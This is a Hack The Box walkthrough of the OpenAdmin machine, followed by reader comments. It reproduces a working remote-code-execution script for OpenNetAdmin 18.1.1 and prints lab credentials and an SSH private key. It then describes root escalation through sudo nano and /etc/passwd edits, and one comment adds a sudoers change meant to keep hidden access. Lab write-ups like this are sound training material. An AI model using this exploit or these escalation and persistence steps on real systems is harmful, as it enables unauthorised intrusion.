by 
Hello, welcome to our Hack the Box write up series. Today we are doing OpenAdmin (10.10.10.171), is an easy Linux box.
HackTheBox’s first machine of 2020 seems to be a new year’s gift from HTB to gain some points and ranks all their users. This machine is very simple and straight-forward.
Let us start.
NMAP Port Scan
As usual, let us add the machine’s IP to etc/hosts as openadmin.htb for easier access. The next step is to run start the namp scan.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
# root @ ns09 in ~/htb/openadmin [21:53:45] $ cat OpenAdmin_all_ports.nmap # Nmap 7.80 scan initiated Sun Jan 5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb Warning: 10.10.10.171 giving up on port because retransmission cap hit (2). Nmap scan report for openadmin.htb (10.10.10.171) Host is up (0.15s latency). Not shown: 65503 closed ports, 30 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jan 5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds # root @ ns09 in ~/htb/openadmin [21:53:57] |
The namp scan result shows, SSH on port 22, TCP port 80 which normally runs an HTTP service are open. A quick visit to port 80 shows the Apache2 website’s default welcome page.
The box is not disclosed anything interesting so far apart from a webpage and SSH. We might need to find directories for better enumeration. To see directories we need to run Dirbiuster, Let us set Dirbuster’s medium wordlist and start the scan.
let the Dirbuster run in the background and let us start enumerating the subdirectories it showed in the initial results. I started to concentrate on two directories, ONA and Music. I opened the http://openadmin.htb/ona which took me a webpage. This is the OpenNetAdmin control panel. The OpenNetAdmin is an opensource IP Address Management (IPAM) system.
A warning on the homepage shows the version of the app is 18.1.1. A quick look at vulnerabilities of version 18.1.1 on Google, shows the current version is vulnerable to RCE (remote code execution). So, at this point, we understood that this box is a victim of recently discovered exploit.
The ExploitDB listed two exploits, a Metasploit module, and a bash script.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution # Date: 2019-11-19 # Exploit Author: mattpascoe # Vendor Homepage: http://opennetadmin.com/ # Software Link: https://github.com/opennetadmin/ona # Version: v18.1.1 # Tested on: Linux # Exploit Title: OpenNetAdmin v18.1.1 RCE # Date: 2019-11-19 # Exploit Author: mattpascoe # Vendor Homepage: http://opennetadmin.com/ # Software Link: https://github.com/opennetadmin/ona # Version: v18.1.1 # Tested on: Linux #!/bin/bash URL="${1}" while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done |
I just download the script to my OpenAdmin working directory and run the script. The script gave me a shell as www-data immediately.
Since the user www-data is a low privileged user, we will not be able to perform any major tasks. So, we need to escalate his privilege to the next big user.
First, we need to find the users in the box. let us use cat /etc/passwd to see if we can perform the cat command to list the users.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
$ ls -l /etc/passwd -rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false joanna:x:1001:1001:,,,:/home/joanna:/bin/bash $ |
So we found a number of users in this box, but I’m not sure which one I should start to above to get the privilege. let us start to enumerate the box searching for hints.
After a while, I found a PHP file called “database_settings.inc.php” inside the directory; /opt/ona/www/local/config/. The file has MySQL database credentials.
So far, we are not sure about which user we could use these credentials, so I listed the current local users of the box and I found jimmy and joanna.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ cat /opt/ona/www/local/config/database_settings.inc.php <?php $ona_contexts=array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, ), ), 'description' => 'Default data context', 'context_color' => '#D3DBFF', ), ); $ |
Privilege Escalation
As the SSH was running, I tried ssh the box as jimmy, luckily it worked.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
# root @ ns09 in ~/htb/openadmin [20:32:08] $ ssh jimmy@openadmin.htb jimmy@openadmin.htb's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Jan 8 17:33:45 UTC 2020 System load: 0.38 Processes: 200 Usage of /: 49.1% of 7.81GB Users logged in: 2 Memory usage: 34% IP address for ens160: 10.10.10.171 Swap usage: 0% => There is 1 zombie process. * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Jan 8 17:30:22 2020 from 10.10.15.63 jimmy@openadmin:~$ ls jimmy@openadmin:~$ cd home -bash: cd: home: No such file or directory jimmy@openadmin:~$ ls -la total 32 drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 . drwxr-xr-x 4 root root 4096 Nov 22 18:00 .. lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile jimmy@openadmin:~$ |
However, after a while, It has been realized this user doesn’t have a User flag, so let us proceed to enumerate more. The user’s www folder has a special folder called “internal” which contained,
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
jimmy@openadmin:~$ ls jimmy@openadmin:~$ ls -la total 32 drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 . drwxr-xr-x 4 root root 4096 Nov 22 18:00 .. lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile jimmy@openadmin:~$ cd / jimmy@openadmin:/$ ls bin cdrom etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old boot dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz jimmy@openadmin:/$ cd var jimmy@openadmin:/var$ ls backups cache crash lib local lock log mail opt run snap spool tmp www jimmy@openadmin:/var$ cd www jimmy@openadmin:/var/www$ ls html internal ona jimmy@openadmin:/var/www$ cd internal jimmy@openadmin:/var/www/internal$ ls index.php logout.php main.php jimmy@openadmin:/var/www/internal$ cat main.php <?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; # Open Admin Trusted # OpenAdmin $output = shell_exec('cat /home/joanna/.ssh/id_rsa'); echo "<pre>output</pre>"; ?> <html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> jimmy@openadmin:/var/www/internal$ |
The file “main.php” is our key to get the private key from user Joanna and login as Joanna. To get the private key, we need to run a cURL command. Upon proceeding to run cURL as local, We are blocked by an error “404 Not Found” with 127.0.0.1 running in the port 80. This made me realized that I need to find the port number which will give me access to the private key.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
jimmy@openadmin:~$ curl http://127.0.0.1/main.php <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address> </body></html> jimmy@openadmin:~$ |
To find open ports within the system, I run “netstat -tulpn” command. The netstat listed a few open and listening ports:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
jimmy@openadmin:/var/www/internal$ netstat -tulpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:* - |
I proceed with one by one, the second port 52846 returned the private key of user Joanna.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:3306/main.php Warning: Binary output can mess up your terminal. Use "--output -" to tell Warning: curl to output it to your terminal anyway, or consider "--output Warning: <FILE>" to save to a file. jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php <pre>-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY----- </pre><html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> jimmy@openadmin:/var/www/internal$ |
The SSH key has a password phrase for login, I copied the key to my Kali machine and used John to crack the password using rockyou.txt. John cracked the password as “bloodninjas“. I immediately SSH the box- as Joanna and got the user.txt.
|
1 2 3 4 5 |
joanna@openadmin:~$ ls user.txt joanna@openadmin:~$ cat user.txt c9b2c[---------]c81b5f joanna@openadmin:~$ |
Getting Into the Root
There are two ways you can get the root access on this machine using the privileges of our user Joanna. The first one is very simple by opening the nano as root and reding the root.txt file. The second one is getting the shell as root by adding yourself as the root user by editing the etc/passwd file, and then switch the user as your own user name.
Procedure 1: getting the root flag from nano:
The sudo -l command revealed that the user Joanna is able to run bin/nano /opt/priv as root without password. When you see the user can run nano as root, it is the simplest thing to exploit. Just 3 commands and the box is yours.
Run:
|
1 |
joanna@openadmin:~$ sudo /bin/nano /opt/priv |
Does the Sudo confirm if you really need to run the file as root? obviously say “yes”.
Now, that you have nano running as root. Press CTR+ R (Read File) root/root.txt
And CTR+O (Write file) to read the root.txt.
Procedure 2: Adding yourself as a root user
Press CTRL+O to read the file etc/passwd
Now the nano displays the contents of etc/passwd file, create a user in your name and assign a password and save using CTRL+O (Write file). Then exit the nano, go back to the terminal.
That’s it. Thank you for reading.
when i connect to ssh say the password is wrong ! so how you get the connection 😀
I had the right password, Lol. Check your password. BTW, I just wakeup my laptop from sleeping and logged in, connect HTB VPN and then connect the SSH, just to check if I was wrong, but I was right, its working.
when i connect to first time with user [jimmy] and password [n1nj4W4rri0R!] using my ssh on kali [ssh jimmy@ openadmin . htb ] it say permission denied , so i don’t know why that happen after i type the password even i rest the machine more than once !!
Hello,
I just left you some respect on HTB. I appreciate you posting your methods. I try to find at least 2 or 3 write-ups to compare how I approached the problem compared to others. Interesting enough I always find something and learn something new. I just wanted to say thanks and BTW you can use nano to run commands. you can do a cntrl-r and then a control-x … this approach was helpful for me when taking down openadmin.
Cheers,
Ch3ckm473
Thanks for the respect and for suggesting the Nano 🙂
Was a good write up. I couldn’t get john to work but the rest was good. Only thing I did differently was instead of adding an account for me, I just modified /etc/sudoers to say
joanna (ALL) NOPASSWD: ALL.
No additional users to raise suspicion, might preserve my presence in the system for a bit longer.